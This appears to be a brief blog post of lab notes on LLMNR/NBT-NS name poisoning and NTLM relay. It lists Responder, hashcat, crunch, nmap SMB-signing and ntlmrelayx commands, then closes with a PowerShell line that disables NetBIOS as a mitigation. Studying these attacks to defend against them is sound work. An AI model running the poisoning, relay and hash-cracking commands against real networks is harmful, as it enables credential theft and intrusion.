Mitigating name poisoning & ntlm relay

responder -I eth0 -rdwv
hashcat -m 5600 TEST_hash.txt mywordlist.txt --force
crunch 20 20 -t CarolinaPanthers^^%% -o /root/Documents/mywordlist.txt
  • @ = lower case letters
  • , = upper case letters
  • % = numbers
  • ^ = symobls
nmap -p 445 --script smb2-security-mode <IP range>
pip3 install .
responder -I eth0 -rdwv
ntlmrelayx.py -tf targets.txt -smb2support
$regkey = “HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces”Get-ChildItem $regkey | foreach { Set-ItemProperty -Path “$regkey\$($_.pschildname)” -Name NetbiosOptions -Value 2 -Verbose}

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Rich

Rich

15 Followers

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from work or the lab.